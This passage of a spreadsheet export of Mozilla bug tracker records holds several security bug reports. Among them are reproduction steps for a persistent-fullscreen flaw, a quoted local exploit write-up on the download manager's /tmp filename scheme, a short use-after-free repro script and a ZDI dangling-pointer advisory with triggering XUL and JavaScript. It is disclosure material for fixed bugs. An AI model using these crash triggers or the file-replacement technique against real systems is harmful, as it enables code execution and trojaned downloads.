    #10 0x7f2f823f2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:613:21
    #11 0x7f2f823bd6db in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:566:14
.
.
.</t>
        </is>
      </c>
      <c r="X4669" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4670">
      <c r="A4670" t="n">
        <v>1739220</v>
      </c>
      <c r="B4670" t="inlineStr">
        <is>
          <t>2021-11-03 13:54:20 -0700</t>
        </is>
      </c>
      <c r="C4670" t="inlineStr">
        <is>
          <t>Invoke requestFullscreen from iFrame src with Different Origin then Navigate to Page on bfcache Lead to Persistent Fullscreen Mode for Entire Session</t>
        </is>
      </c>
      <c r="D4670" t="inlineStr">
        <is>
          <t>2024-10-13 08:25:28 -0700</t>
        </is>
      </c>
      <c r="E4670" t="n">
        <v>1</v>
      </c>
      <c r="F4670" t="n">
        <v>1</v>
      </c>
      <c r="G4670" t="n">
        <v>3</v>
      </c>
      <c r="H4670" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4670" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4670" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K4670" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4670" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4670" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4670" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4670" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4670" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][sec-survey][adv-main96+][adv-ESR91.5+]</t>
        </is>
      </c>
      <c r="Q4670" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4670" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4670" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T4670" t="n">
        <v>1</v>
      </c>
      <c r="U4670" t="n">
        <v>0</v>
      </c>
      <c r="V4670" t="n">
        <v>30</v>
      </c>
      <c r="W4670" t="inlineStr">
        <is>
          <t>Created attachment 9249121
testcase.html
After iFrame on different origin invoke `requestFullscreen()` then parent page navigate to page on bfcache, the browser will goes into fullscreen with OS taskbar still visible, interestingly after pressing "esc" multiple times it will not exit the browser fullscreen mode for the entire current session. For me the only way to exit the browser is from OS taskbar or task manager taskill.
I can only reproduce this on Fission enabled and `fission.bfcacheInParent` toggled to `true` which the default since commit [Enable BFCache in parent when Fission is enabled](https://bugzilla.mozilla.org/show_bug.cgi?id=1715300).
## Steps to reproduce:
1. Visit https://www.google.com to store page on BFCache
2. Visit attached testcase.html
3. Click on iFrame element
4. Browser goes into fullscreen mode then automatically navigate to https://www.google.com
5. Press "esc" multiple times
6. Browser stay in fullscreen mode with OS taskbar still visible</t>
        </is>
      </c>
      <c r="X4670" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4671">
      <c r="A4671" t="n">
        <v>514823</v>
      </c>
      <c r="B4671" t="inlineStr">
        <is>
          <t>2009-09-05 00:22:44 -0700</t>
        </is>
      </c>
      <c r="C4671" t="inlineStr">
        <is>
          <t>Incremental filename choosing scheme for duplicate filenames vulnerable (especially with the use of /tmp)</t>
        </is>
      </c>
      <c r="D4671" t="inlineStr">
        <is>
          <t>2009-10-30 08:01:04 -0700</t>
        </is>
      </c>
      <c r="E4671" t="n">
        <v>1</v>
      </c>
      <c r="F4671" t="n">
        <v>1</v>
      </c>
      <c r="G4671" t="n">
        <v>3</v>
      </c>
      <c r="H4671" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4671" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4671" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K4671" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4671" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4671" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4671" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4671" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4671" t="inlineStr">
        <is>
          <t>[sg:low local] moderate-to-critical on a shared unix machine</t>
        </is>
      </c>
      <c r="Q4671" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4671" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4671" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T4671" t="n">
        <v>1</v>
      </c>
      <c r="U4671" t="n">
        <v>0</v>
      </c>
      <c r="V4671" t="n">
        <v>65</v>
      </c>
      <c r="W4671" t="inlineStr">
        <is>
          <t>Created attachment 398828
PoC
On 09/03/09, Jeremy Brown reported a security vulnerability in the download manager / file handling code to security@mozilla.org.
Mozilla Firefox 3.x Download Manager Local Exploit
Jeremy Brown 07-24-2009
TESTED
Ubuntu Linux 9.04 (Jaunty) + Mozilla Firefox 3.0.12 -&gt; Fully Exploitable
Windows XP Professional SP3 + Mozilla Firefox 3.5.1 -&gt; Partially Exploitable
When downloading files through Firefox and choosing the "Open with" option, Firefox will create a temporary file
in the form of RANDOM.part ("RANDOM" is random alphanumeric characters and ".part" is the extension). When the
download completes, Firefox saves the completed file in the "/tmp" directory as its original filename and opens
it with the program's handler (for example, Ark for compressed archives, VLC for .mp3, WINE for .exe, etc).
Now, what if there is already a file with an identical filename in the temporary file directory? Firefox uses
the scheme of saving and opening the completed download as "/tmp/file-#.zip", where "file" is the file's name,
"-#" is a dash and the next available number in order, and ".zip" is of course the file's extension. So if
"/tmp/file.zip" already exists and the user tries to download a file with the same name, Firefox saves and opens
the newly downloaded file as "/tmp/file-1.zip". That scheme looked suspicious to me, and raised a couple good
questions.
1) What is the maximum number in the filename?
2) What happens when it reaches that maximum number?
Testing has proved that 9999, for example "/tmp/file-9999.zip", is the maximum number Firefox will use to deal
with identical "Open with" filenames. Instead of using "/tmp/file-10000.zip", Firefox will just use the original
identical file instead of the one it was supposed to download and open. That can get dangerous when local users
can write to "/tmp" just like everybody else :)
To exploit this situation, we need to know the filename that will be downloaded ahead of time. Then it is just
a matter of creating the excess files, placing our "replacement" file (with the identical filename) in "/tmp",
and waiting for the target user to use the "Open with" option to download and open a file of our choosing. We
wouldn't even nessesarily have to know "ahead of time". According to how long it would take to complete the
download (remember Firefox is writing to "/tmp/RANDOM.part" until its finished downloading), we could do our
business while the file is still downloading (again, as long as we know its filename).
There are many scenarios where we could leverage this vulnerability... here is one example.
* Administrator is downloading openssh-5.2.tar.gz
* We run the exploit to replace openssh-5.2.tar.gz with a modified version
* Administrator installs our OpenSSH 5.2 with our _modifications_
For a bonus, the download history will still show the name of the site that supplied the original file, even
when the target user opened the attacker's file instead.
There are only two real conditions that have to be met for exploitation to succeed:
1. We need the ability to locally write in "/tmp" (shell, ftp, etc with write permissions for "/tmp")
2. The target user downloads and opens the filename using "Open with"
Firefox on Windows has slightly different results. I found during testing that when the download completes, the
right file will be opened. But, although unreliable, we were able to get the history of the file in download
manager to show the replacement file and it will be opened if the user chooses to open it from there.
mozilla-1.9.1/xpcom/io/nsLocalFileCommon.cpp -&gt; LINES [85-174]:
NS_IMETHODIMP
nsLocalFile::CreateUnique(PRUint32 type, PRUint32 attributes)
{
    nsresult rv;
    PRBool longName;
#ifdef XP_WIN
    nsAutoString pathName, leafName, rootName, suffix;
    rv = GetPath(pathName);
#else
    nsCAutoString pathName, leafName, rootName, suffix; 
    rv = GetNativePath(pathName);
#endif
    if (NS_FAILED(rv))
        return rv;
    longName = (pathName.Length() + kMaxSequenceNumberLength &gt;
                kMaxFilenameLength);
    if (!longName)
    {
        rv = Create(type, attributes);
        if (rv != NS_ERROR_FILE_ALREADY_EXISTS)
            return rv;
    }
#ifdef XP_WIN
    rv = GetLeafName(leafName);
    if (NS_FAILED(rv))
        return rv;
    const PRInt32 lastDot = leafName.RFindChar(PRUnichar('.'));
#else
    rv = GetNativeLeafName(leafName);
    if (NS_FAILED(rv))
        return rv;
    const PRInt32 lastDot = leafName.RFindChar('.');
#endif
    if (lastDot == kNotFound)
    {
        rootName = leafName;
    } 
    else
    {
        suffix = Substring(leafName, lastDot);      // include '.'
        rootName = Substring(leafName, 0, lastDot); // strip suffix and dot
    }
    if (longName)
    {
        PRUint32 maxRootLength = (kMaxFilenameLength -
                                  (pathName.Length() - leafName.Length()) -
                                  suffix.Length() - kMaxSequenceNumberLength);
#ifdef XP_WIN
        // ensure that we don't cut the name in mid-UTF16-character
        rootName.SetLength(NS_IS_LOW_SURROGATE(rootName[maxRootLength]) ?
                           maxRootLength - 1 : maxRootLength);
        SetLeafName(rootName + suffix);
#else
        if (NS_IsNativeUTF8())
            // ensure that we don't cut the name in mid-UTF8-character
            while (UTF8traits::isInSeq(rootName[maxRootLength]))
                --maxRootLength;
        rootName.SetLength(maxRootLength);
        SetNativeLeafName(rootName + suffix);
#endif
        nsresult rv = Create(type, attributes);
        if (rv != NS_ERROR_FILE_ALREADY_EXISTS)
            return rv;
    }
    for (int indx = 1; indx &lt; 10000; indx++)
    {
        // start with "Picture-1.jpg" after "Picture.jpg" exists
#ifdef XP_WIN
        SetLeafName(rootName +
                    NS_ConvertASCIItoUTF16(nsPrintfCString("-%d", indx)) +
                    suffix);
#else
        SetNativeLeafName(rootName + nsPrintfCString("-%d", indx) + suffix);
#endif
        rv = Create(type, attributes);
        if (NS_SUCCEEDED(rv) || rv != NS_ERROR_FILE_ALREADY_EXISTS) 
            return rv;
    }
    // The disk is full, sort of
    return NS_ERROR_FILE_TOO_BIG;
}
I also test the "Save As" option and it doesn't seem to be vulnerable (it saved, for example, file(1000000).zip).
Full exploit code is provided (ffdlx.c).
Example exploitation:
linux@ubuntu:~$ ./ffdlx 2000 zip /home/linux/Desktop/test.zip
(target downloads 2000.zip from a website but opens test.zip instead)
exploit complete!</t>
        </is>
      </c>
      <c r="X4671" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4672">
      <c r="A4672" t="n">
        <v>539742</v>
      </c>
      <c r="B4672" t="inlineStr">
        <is>
          <t>2010-01-14 11:09:54 -0800</t>
        </is>
      </c>
      <c r="C4672" t="inlineStr">
        <is>
          <t>Revise front page and navigation</t>
        </is>
      </c>
      <c r="D4672" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E4672" t="n">
        <v>1</v>
      </c>
      <c r="F4672" t="n">
        <v>1</v>
      </c>
      <c r="G4672" t="n">
        <v>4</v>
      </c>
      <c r="H4672" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4672" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4672" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4672" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4672" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4672" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4672" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4672" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4672" t="inlineStr"/>
      <c r="Q4672" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4672" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4672" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="T4672" t="n">
        <v>1</v>
      </c>
      <c r="U4672" t="n">
        <v>0</v>
      </c>
      <c r="V4672" t="n">
        <v>25</v>
      </c>
      <c r="W4672" t="inlineStr">
        <is>
          <t>Tracking bug for front page and navigation improvements.</t>
        </is>
      </c>
      <c r="X4672" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4673">
      <c r="A4673" t="n">
        <v>880194</v>
      </c>
      <c r="B4673" t="inlineStr">
        <is>
          <t>2013-06-06 04:27:02 -0700</t>
        </is>
      </c>
      <c r="C4673" t="inlineStr">
        <is>
          <t>Army of Awesome not picking up new tweets</t>
        </is>
      </c>
      <c r="D4673" t="inlineStr">
        <is>
          <t>2013-06-10 14:20:55 -0700</t>
        </is>
      </c>
      <c r="E4673" t="n">
        <v>1</v>
      </c>
      <c r="F4673" t="n">
        <v>1</v>
      </c>
      <c r="G4673" t="n">
        <v>5</v>
      </c>
      <c r="H4673" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4673" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4673" t="inlineStr">
        <is>
          <t>Army of Awesome</t>
        </is>
      </c>
      <c r="K4673" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4673" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4673" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4673" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4673" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4673" t="inlineStr">
        <is>
          <t>u=contributor c=AoA p=1 s=2013.11</t>
        </is>
      </c>
      <c r="Q4673" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4673" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4673" t="inlineStr">
        <is>
          <t>2013Q2</t>
        </is>
      </c>
      <c r="T4673" t="n">
        <v>1</v>
      </c>
      <c r="U4673" t="n">
        <v>1</v>
      </c>
      <c r="V4673" t="n">
        <v>5</v>
      </c>
      <c r="W4673" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 (Beta/Release)
Build ID: 20130511120803
Steps to reproduce:
 - navigate to Army of Awesome: https://support.mozilla.org/en-US/army-of-awesome
 - Check most recent tweet
Actual results:
 - Most recent available tweet is 14 hours old
 - New tweets mentioning Firefox are not appearing
Expected results:
 - New tweets mentioning Firefox should appear</t>
        </is>
      </c>
      <c r="X4673" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4674">
      <c r="A4674" t="n">
        <v>1710290</v>
      </c>
      <c r="B4674" t="inlineStr">
        <is>
          <t>2021-05-09 05:26:17 -0700</t>
        </is>
      </c>
      <c r="C4674" t="inlineStr">
        <is>
          <t>For OpenPGP secret keys imported with Thunderbird versions 78.8.1 - 78.10.1, the master password isn't effective</t>
        </is>
      </c>
      <c r="D4674" t="inlineStr">
        <is>
          <t>2022-06-09 11:20:57 -0700</t>
        </is>
      </c>
      <c r="E4674" t="n">
        <v>1</v>
      </c>
      <c r="F4674" t="n">
        <v>1</v>
      </c>
      <c r="G4674" t="n">
        <v>3</v>
      </c>
      <c r="H4674" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4674" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4674" t="inlineStr">
        <is>
          <t>Security: OpenPGP</t>
        </is>
      </c>
      <c r="K4674" t="inlineStr">
        <is>
          <t>79</t>
        </is>
      </c>
      <c r="L4674" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4674" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4674" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4674" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4674" t="inlineStr"/>
      <c r="Q4674" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4674" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4674" t="inlineStr">
        <is>
          <t>90 Branch</t>
        </is>
      </c>
      <c r="T4674" t="n">
        <v>1</v>
      </c>
      <c r="U4674" t="n">
        <v>1</v>
      </c>
      <c r="V4674" t="n">
        <v>29</v>
      </c>
      <c r="W4674" t="inlineStr">
        <is>
          <t>The default behavior of Thunderbird 78 is to use an automatic protection mechanism for OpenPGP secret keys. To protect the keys at rest, users are required to set a master password.
Versions from 78.8.1 until 78.10.1 contain a regression bug (introduced by bug 1673239) that imports keys without protection. As a result, even having a master password set doesn't protect the local storage of the secret key.
I'm initially filing this as a security senstitive bug, however, I suggest to open this bug immediately (today), because several users have publicly reported on the Thunderbird e2ee mailing list that the master password protection is ineffective for them.</t>
        </is>
      </c>
      <c r="X4674" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4675">
      <c r="A4675" t="n">
        <v>588929</v>
      </c>
      <c r="B4675" t="inlineStr">
        <is>
          <t>2010-08-19 13:20:47 -0700</t>
        </is>
      </c>
      <c r="C4675" t="inlineStr">
        <is>
          <t>Use after free - nsBarProp</t>
        </is>
      </c>
      <c r="D4675" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:21 -0700</t>
        </is>
      </c>
      <c r="E4675" t="n">
        <v>1</v>
      </c>
      <c r="F4675" t="n">
        <v>1</v>
      </c>
      <c r="G4675" t="n">
        <v>3</v>
      </c>
      <c r="H4675" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4675" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4675" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4675" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4675" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4675" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4675" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4675" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4675" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4675" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4675" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4675" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4675" t="n">
        <v>1</v>
      </c>
      <c r="U4675" t="n">
        <v>0</v>
      </c>
      <c r="V4675" t="n">
        <v>14</v>
      </c>
      <c r="W4675" t="inlineStr">
        <is>
          <t>Reproduced on 4.0b5pre and 3.6.8.
The repro contains this:
  w = open(1, 1, 1);
  o = w.locationbar;
  w.close();
  s = '';
  setInterval('s += o.visible', 50);
http://crash-stats.mozilla.com/report/index/1b83dc24-cdb7-4435-838d-643822100819</t>
        </is>
      </c>
      <c r="X4675" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4676">
      <c r="A4676" t="n">
        <v>1127481</v>
      </c>
      <c r="B4676" t="inlineStr">
        <is>
          <t>2015-01-29 11:43:01 -0800</t>
        </is>
      </c>
      <c r="C4676" t="inlineStr">
        <is>
          <t>Run updater.exe from the application directory when not using the service for an update</t>
        </is>
      </c>
      <c r="D4676" t="inlineStr">
        <is>
          <t>2016-07-02 10:39:18 -0700</t>
        </is>
      </c>
      <c r="E4676" t="n">
        <v>1</v>
      </c>
      <c r="F4676" t="n">
        <v>1</v>
      </c>
      <c r="G4676" t="n">
        <v>3</v>
      </c>
      <c r="H4676" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4676" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4676" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K4676" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4676" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4676" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4676" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4676" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4676" t="inlineStr">
        <is>
          <t>[adv-main38+]</t>
        </is>
      </c>
      <c r="Q4676" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4676" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4676" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T4676" t="n">
        <v>1</v>
      </c>
      <c r="U4676" t="n">
        <v>0</v>
      </c>
      <c r="V4676" t="n">
        <v>54</v>
      </c>
      <c r="W4676" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #945192 +++
From bug 945192 comment #250
"The patch as it stands I believe covers loading all dll's placed in the directory alongside the updater.exe except for the following cases using Firefox x86:
Windows Vista x86 and x64 - apphelp.dll
Windows XP x64 - wow64log.dll
Firefox x64 is fixed.
To fix this for the two cases above the directory where the updater.exe would need to be secured which we can't guarantee with our current policy of allowing users to install into a directory of their own choosing and the fact that the user can change the permissions of the directory.
To address these two cases I am planning on running the updater from the application directory when not using the service. This would require not staging updates when not using the service which I don't see as a major issue since the vast majority of users use the maintenance service with less than 5% not using it according to telemetry. The visible affect of not using staging is it taking longer to apply an update during startup.
Making app update use the updater.exe from the application directory will take time to implement and I am unsure of the amount of time it will take. Since the affected systems after the current patch lands are a very small subset of the Windows install base we need to decide whether or not we should hold off on landing the current patch until this additional work is completed."</t>
        </is>
      </c>
      <c r="X4676" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4677">
      <c r="A4677" t="n">
        <v>538308</v>
      </c>
      <c r="B4677" t="inlineStr">
        <is>
          <t>2010-01-06 16:53:13 -0800</t>
        </is>
      </c>
      <c r="C4677" t="inlineStr">
        <is>
          <t>nsTreeContentView Dangling Pointer Vulnerability (ZDI-CAN-633)</t>
        </is>
      </c>
      <c r="D4677" t="inlineStr">
        <is>
          <t>2010-07-25 16:42:09 -0700</t>
        </is>
      </c>
      <c r="E4677" t="n">
        <v>1</v>
      </c>
      <c r="F4677" t="n">
        <v>1</v>
      </c>
      <c r="G4677" t="n">
        <v>3</v>
      </c>
      <c r="H4677" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4677" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4677" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K4677" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L4677" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4677" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4677" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4677" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4677" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4677" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4677" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4677" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T4677" t="n">
        <v>1</v>
      </c>
      <c r="U4677" t="n">
        <v>0</v>
      </c>
      <c r="V4677" t="n">
        <v>43</v>
      </c>
      <c r="W4677" t="inlineStr">
        <is>
          <t>Created attachment 420452
XUL testcase
ZDI-CAN-633: Mozilla Firefox nsTreeContentView Dangling Pointer Vulnerability
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following 
products:
    Mozilla Firefox 3.5.x
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required in that the victim must visit a malicious website or be coerced
into opening a malicious document.
The specific flaw exists within the way that Mozilla's Firefox parses
.XUL files. While appending a particular tag to a treechildren
container, the application will create more than one reference to a
particular element without increasing its reference count. Upon removal
of one of the elements, the refcount will be decreased causing the
application to free the memory associated with the object. Due to the
rogue reference occurring, the next time the application attempts to
reference that container, the application will access memory that has
been freed which can lead to code execution under the context of the
application.
Version(s)  tested: Mozilla Firefox 3.5.6
Platform(s) tested: Windows XP SP3
The vulnerability occurs due to the application incorrectly creating
more than one "option" element inside an "optgroup" element within a
"treechildren" container.
The XML used to describe this vulnerability is shown below.
    &lt;tree id="tr" flex="1"&gt;
        &lt;treecols&gt;
            &lt;treecol/&gt;
        &lt;/treecols&gt;
        &lt;treechildren&gt;
            &lt;html:optgroup id="optgroup"&gt;
                &lt;html:option id="disappear" /&gt;
            &lt;/html:optgroup&gt;
        &lt;/treechildren&gt;
    &lt;/tree&gt;
To reproduce the issue, one will need to manipulate this document via
javascript.
optgroup = document.getElementById("optgroup");
treechildren = document.createElement("treechildren");
optgroup.appendChild(tc);
v = document.getElementById("disappear");
v.parentNode.removeChild(v);
v = null;
tree = document.getElementById("tr");
col = tree.columns[0];
alert(tree.view.getItemAtIndex(1, col)); 
When appending an element to an XUL tree, the application will call the
following code.
layout/xul/base/src/tree/src/nsTreeContentView.cpp:966
void
nsTreeContentView::ContentInserted(nsIDocument *aDocument,
                                   nsIContent* aContainer,
                                   nsIContent* aChild,
                                   PRInt32 aIndexInContainer)
{
Upon an optgroup being appended to a tree, the following code will add a
row for the optgroup.
layout/xul/base/src/tree/src/nsTreecontentView.cpp:1038
  else if (childTag == nsGkAtoms::optgroup) {
    InsertRowFor(aContainer, aChild);       // XXX
  }
  else if (childTag == nsGkAtoms::option) {
    PRInt32 parentIndex = FindContent(aContainer);
    PRInt32 index = 0;
    GetIndexInSubtree(aContainer, aChild, &amp;index);
    PRInt32 count = InsertRow(parentIndex, index, aChild);  // XXX
    if (mBoxObject)
      mBoxObject-&gt;RowCountChanged(parentIndex + index + 1, count);
  }
Upon adding another treechildren element, the application will duplicate
the element and add a new row to the tree.
layout/xul/base/src/tree/src/nsTreeContentView.cpp:1007
  if (childTag == nsGkAtoms::treechildren) {
    PRInt32 index = FindContent(aContainer);
    if (index &gt;= 0) {
      Row* row = (Row*)mRows[index];
      row-&gt;SetEmpty(PR_FALSE);
      if (mBoxObject)
        mBoxObject-&gt;InvalidateRow(index);
      if (row-&gt;IsContainer() &amp;&amp; row-&gt;IsOpen()) {
        PRInt32 count = EnsureSubtree(index);   // XXX: index = 0, and
should be pointing to the optgroup
        if (mBoxObject)
          mBoxObject-&gt;RowCountChanged(index + 1, count);
      }
    }
  }
  nsCOMPtr&lt;nsIContent&gt; child;
  if (row-&gt;mContent-&gt;Tag() == nsGkAtoms::optgroup)
    child = row-&gt;mContent;
  else {
    nsTreeUtils::GetImmediateChild(row-&gt;mContent,
nsGkAtoms::treechildren, getter_AddRefs(child));
    if (! child) {
      return 0;
    }
  }
Calling EnsureSubtree will serialize the object at the specified row
index.
layout/xul/base/src/tree/src/nsTreeContentView.cpp:1297
PRInt32
nsTreeContentView::EnsureSubtree(PRInt32 aIndex)
{
  Row* row = (Row*)mRows[aIndex];
  nsCOMPtr&lt;nsIContent&gt; child;
  if (row-&gt;mContent-&gt;Tag() == nsGkAtoms::optgroup)
    child = row-&gt;mContent;
  else {
    nsTreeUtils::GetImmediateChild(row-&gt;mContent,
nsGkAtoms::treechildren, getter_AddRefs(child));
    if (! child) {
      return 0;
    }
  }
  nsAutoVoidArray rows;
  PRInt32 index = 0;
  Serialize(child, aIndex, &amp;index, rows);   // XXX: serialize the
optgroup again due to both indexes referencing the same variable
  mRows.InsertElementsAt(rows, aIndex + 1);
  PRInt32 count = rows.Count();
Calling Serialize will serialize an element and add it to the row
specified by index. 
layout/xul/base/src/tree/src/nsTreeContentView.cpp:1139
// Recursively serialize content, starting with aContent.
void
nsTreeContentView::Serialize(nsIContent* aContent, PRInt32 aParentIndex,
PRInt32* aIndex, nsVoidArray&amp; aRows)
{
  ChildIterator iter, last;
  for (ChildIterator::Init(aContent, &amp;iter, &amp;last); iter != last;
++iter) {
    nsCOMPtr&lt;nsIContent&gt; content = *iter;
    nsIAtom *tag = content-&gt;Tag();
    PRInt32 count = aRows.Count();
    if (content-&gt;IsNodeOfType(nsINode::eXUL)) {
      if (tag == nsGkAtoms::treeitem)
        SerializeItem(content, aParentIndex, aIndex, aRows);
      else if (tag == nsGkAtoms::treeseparator)
        SerializeSeparator(content, aParentIndex, aIndex, aRows);
    }
    else if (content-&gt;IsNodeOfType(nsINode::eHTML)) {
      if (tag == nsGkAtoms::option)
        SerializeOption(content, aParentIndex, aIndex, aRows);  // XXX
      else if (tag == nsGkAtoms::optgroup)
        SerializeOptGroup(content, aParentIndex, aIndex, aRows);
    }
